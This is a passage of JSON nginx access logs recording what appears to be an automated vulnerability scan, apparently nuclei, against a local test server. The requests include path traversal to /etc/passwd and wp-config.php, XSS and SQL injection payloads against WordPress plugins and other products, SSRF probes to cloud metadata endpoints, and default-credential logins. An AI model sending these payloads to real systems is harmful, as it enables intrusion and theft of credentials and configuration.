HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/flags HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/default/view.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /qvisdvr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webacs/pages/common/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"alibaba.interact.sh","request":"GET http://alibaba.interact.sh/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docpicker/internal_proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proftpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"https://example.com", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mlw_quiz_list&s=\x22>&paged=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29KBxXCHFBDIaKBq424I7GAEeYl.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"100.100.100.200","request":"GET http://100.100.100.200/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /frontend/web/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\x22;user|s.\x221337\x22; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"username=showdoc&password=123456&v_code=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /server/index.php?s=/api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/setup-config.php?step=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /asd/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apisix/admin/migrate/export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/maint/repair.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"username=admin&password=ixcache","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0A29KBxergsoVigThtU7CVARt5ebG\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22passconf\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22email\x22\x0D\x0A\x0D\x0Atest@29KBxergsoVigThtU7CVARt5ebG.tld\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22editid\x22\x0D\x0A\x0D\x0A\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22add\x22\x0D\x0A\x0D\x0Aadd\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22ulevelid\x22\x0D\x0A\x0D\x0A9\x0D\x0A--01b28e152ee044338224bf647275f8eb--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lib/crud/userprocess.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"\x0D\x0A\x0D\x0A&e1;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /haproxy-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 